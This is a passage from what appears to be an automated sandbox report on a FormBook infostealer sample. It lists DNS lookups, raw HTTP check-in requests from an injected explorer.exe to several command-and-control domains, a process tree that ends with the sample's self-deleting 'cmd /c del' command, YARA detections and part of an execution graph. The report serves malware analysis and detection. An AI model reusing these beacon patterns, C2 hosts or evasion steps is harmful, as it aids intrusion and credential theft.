                                                    Jan 28, 2022 21:00:09.424981117 CET192.168.2.38.8.8.80x5eafStandard query (0)www.omnipets.storeA (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:14.622612000 CET192.168.2.38.8.8.80xe911Standard query (0)www.webarate.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jan 28, 2022 20:59:42.790488005 CET8.8.8.8192.168.2.30x48c8No error (0)www.experiencedlawfirms.com166.88.62.202A (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:48.169529915 CET8.8.8.8192.168.2.30xf74dNo error (0)www.totalwinerewards.com199.59.243.200A (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:53.419476032 CET8.8.8.8192.168.2.30x2129No error (0)www.casatowerofficial.comcasatowerofficial.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 28, 2022 20:59:53.419476032 CET8.8.8.8192.168.2.30x2129No error (0)casatowerofficial.com34.102.136.180A (IP address)IN (0x0001)
                                                    Jan 28, 2022 20:59:58.638331890 CET8.8.8.8192.168.2.30x2e9bNo error (0)www.bitconga.com18.231.72.25A (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:04.394292116 CET8.8.8.8192.168.2.30x72a8Name error (3)www.tothelaundry.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:09.445676088 CET8.8.8.8192.168.2.30x5eafNo error (0)www.omnipets.storeomnipets.storeCNAME (Canonical name)IN (0x0001)
                                                    Jan 28, 2022 21:00:09.445676088 CET8.8.8.8192.168.2.30x5eafNo error (0)omnipets.store34.102.136.180A (IP address)IN (0x0001)
                                                    Jan 28, 2022 21:00:14.657841921 CET8.8.8.8192.168.2.30xe911No error (0)www.webarate.comwebarate.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 28, 2022 21:00:14.657841921 CET8.8.8.8192.168.2.30xe911No error (0)webarate.com46.252.151.235A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.experiencedlawfirms.com
                                                    • www.totalwinerewards.com
                                                    • www.casatowerofficial.com
                                                    • www.bitconga.com
                                                    • www.omnipets.store

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.349816166.88.62.20280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 20:59:42.965996981 CET9880OUTGET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1
                                                    Host: www.experiencedlawfirms.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:43.132538080 CET9881INHTTP/1.1 302 Moved Temporarily
                                                    Date: Fri, 28 Jan 2022 19:59:41 GMT
                                                    Connection: close
                                                    Content-Length: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, no-cache, no-store, max-age=0
                                                    Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                    Location: https://www.dynadot.com/forsale/experiencedlawfirms.com?drefid=2071


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.349817199.59.243.20080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 20:59:48.188611984 CET9882OUTGET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1
                                                    Host: www.totalwinerewards.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:48.386589050 CET9883INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 19:59:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: parking_session=915ee359-eb6f-27d3-758c-9b4148d69bcd; expires=Fri, 28-Jan-2022 20:14:48 GMT; Max-Age=900; path=/; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YiK60Qco7iKrEoYb629f/pqFNNxNMwpqSwbmJjBGxbwL67qPTHjuiYjl+re72XQaOdlZyuLDY5NjvdcCv8Qk9g==
                                                    Cache-Control: no-cache
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Cache-Control: no-store, must-revalidate
                                                    Cache-Control: post-check=0, pre-check=0
                                                    Pragma: no-cache
                                                    Data Raw: 35 38 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 69 4b 36 30 51 63 6f 37 69 4b 72 45 6f 59 62 36 32 39 66 2f 70 71 46 4e 4e 78 4e 4d 77 70 71 53 77 62 6d 4a 6a 42 47 78 62 77 4c 36 37 71 50 54 48 6a 75 69 59 6a 6c 2b 72 65 37 32 58 51 61 4f 64 6c 5a 79 75 4c 44 59 35 4e 6a 76 64 63 43 76 38 51 6b 39 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c
                                                    Data Ascii: 589<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YiK60Qco7iKrEoYb629f/pqFNNxNMwpqSwbmJjBGxbwL67qPTHjuiYjl+re72XQaOdlZyuLDY5NjvdcCv8Qk9g=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><
                                                    Jan 28, 2022 20:59:48.386617899 CET9884INData Raw: 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d
                                                    Data Ascii: link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiOTE1ZWUz


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.34981934.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 20:59:53.439712048 CET9894OUTGET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1
                                                    Host: www.casatowerofficial.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:53.555000067 CET9894INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 19:59:53 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61f22041-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.34982018.231.72.2580C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 20:59:59.099003077 CET9895OUTGET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1
                                                    Host: www.bitconga.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:59.332036972 CET9896INHTTP/1.1 301 Moved Permanently
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Fri, 28 Jan 2022 19:59:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 178
                                                    Connection: close
                                                    Location: https://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.34982134.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 28, 2022 21:00:09.463599920 CET9897OUTGET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1
                                                    Host: www.omnipets.store
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 21:00:09.578330040 CET9897INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 20:00:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61f22041-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:20:58:13
                                                    Start date:28/01/2022
                                                    Path:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
                                                    Imagebase:0x590000
                                                    File size:391680 bytes
                                                    MD5 hash:CF6D4FD3DC8E4751B7F89F857B618EF3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Target ID:3
                                                    Start time:20:58:34
                                                    Start date:28/01/2022
                                                    Path:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Imagebase:0xd80000
                                                    File size:391680 bytes
                                                    MD5 hash:CF6D4FD3DC8E4751B7F89F857B618EF3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Target ID:5
                                                    Start time:20:58:37
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff720ea0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    General

                                                    Target ID:10
                                                    Start time:20:59:02
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                    Imagebase:0x90000
                                                    File size:23040 bytes
                                                    MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Target ID:13
                                                    Start time:20:59:09
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
                                                    Imagebase:0xd80000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:14
                                                    Start time:20:59:11
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7f20f0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:11.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:226
                                                      Total number of Limit Nodes:10
                                                      execution_graph 19362 27592f0 19365 27597f0 19362->19365 19363 27592ff 19366 2759803 19365->19366 19367 275981b 19366->19367 19373 2759a78 19366->19373 19377 2759a6b 19366->19377 19367->19363 19368 2759813 19368->19367 19369 2759a18 GetModuleHandleW 19368->19369 19370 2759a45 19369->19370 19370->19363 19374 2759a8c 19373->19374 19376 2759ab1 19374->19376 19381 2759408 19374->19381 19376->19368 19378 2759a74 19377->19378 19379 2759408 LoadLibraryExW 19378->19379 19380 2759ab1 19378->19380 19379->19380 19380->19368 19382 2759c58 LoadLibraryExW 19381->19382 19384 2759cd1 19382->19384 19384->19376 19385 275b7f0 19386 275b856 19385->19386 19390 275b9b0 19386->19390 19393 275b9a3 19386->19393 19387 275b905 19396 2759790 19390->19396 19394 275b9de 19393->19394 19395 2759790 DuplicateHandle 19393->19395 19394->19387 19395->19394 19397 275ba18 DuplicateHandle 19396->19397 19398 275b9de 19397->19398 19398->19387 19568 27540e0 19571 27540fd 19568->19571 19569 275418a 19571->19569 19573 2753888 19571->19573 19577 2754271 19571->19577 19576 2753893 19573->19576 19574 2756b5d 19574->19571 19576->19574 19582 2755894 19576->19582 19578 2754274 19577->19578 19639 2754370 19578->19639 19643 2754360 19578->19643 19583 275589f 19582->19583 19586 27558a4 19583->19586 19585 2756c15 19585->19576 19587 27558af 19586->19587 19590 27558d4 19587->19590 19589 2756cfa 19589->19585 19591 27558df 19590->19591 19594 2755904 19591->19594 19593 2756dea 19593->19589 19596 275590f 19594->19596 19595 275753c 19595->19593 19596->19595 19599 275b420 19596->19599 19604 275b410 19596->19604 19600 275b441 19599->19600 19601 275b465 19600->19601 19609 275b6d8 19600->19609 19613 275b6c8 19600->19613 19601->19595 19605 275b418 19604->19605 19606 275b465 19605->19606 19607 275b6d8 2 API calls 19605->19607 19608 275b6c8 2 API calls 19605->19608 19606->19595 19607->19606 19608->19606 19611 275b6e5 19609->19611 19610 275b71f 19610->19601 19611->19610 19617 2759708 19611->19617 19614 275b6cc 19613->19614 19615 275b71f 19614->19615 19616 2759708 2 API calls 19614->19616 19615->19601 19616->19615 19618 2759713 19617->19618 19620 275c418 19618->19620 19621 275bfd8 19618->19621 19620->19610 19622 275bfe3 19621->19622 19623 2755904 2 API calls 19622->19623 19624 275c487 19622->19624 19623->19624 19628 275e210 19624->19628 19634 275e1f8 19624->19634 19625 275c4c0 19625->19620 19630 275e241 19628->19630 19631 275e28d 19628->19631 19629 275e24d 19629->19625 19630->19629 19632 275e690 LoadLibraryExW GetModuleHandleW 19630->19632 19633 275e68f LoadLibraryExW GetModuleHandleW 19630->19633 19631->19625 19632->19631 19633->19631 19635 275e204 19634->19635 19636 275e24d 19635->19636 19637 275e690 LoadLibraryExW GetModuleHandleW 19635->19637 19638 275e68f LoadLibraryExW GetModuleHandleW 19635->19638 19636->19625 19637->19636 19638->19636 19641 2754397 19639->19641 19640 2754474 19640->19640 19641->19640 19647 2753cc0 19641->19647 19645 2754364 19643->19645 19644 2754474 19644->19644 19645->19644 19646 2753cc0 CreateActCtxA 19645->19646 19646->19644 19648 2755400 CreateActCtxA 19647->19648 19650 27554c3 19648->19650 19651 716a320 19652 716a4ab 19651->19652 19654 716a346 19651->19654 19654->19652 19655 7166974 19654->19655 19656 716a5a0 PostMessageW 19655->19656 19658 716a60c 19656->19658 19658->19654 19399 71682fc 19400 716820d 19399->19400 19401 7168188 19400->19401 19404 7168d70 19400->19404 19419 7168d60 19400->19419 19405 7168d76 19404->19405 19434 7169be4 19405->19434 19438 7169f77 19405->19438 19444 7169659 19405->19444 19449 7169569 19405->19449 19458 7169c3b 19405->19458 19466 716954b 19405->19466 19471 7169d8f 19405->19471 19476 716974e 19405->19476 19481 7169820 19405->19481 19486 7169d42 19405->19486 19490 71699c2 19405->19490 19499 71693f5 19405->19499 19406 7168dcd 19406->19401 19420 7168d6c 19419->19420 19422 7169f77 2 API calls 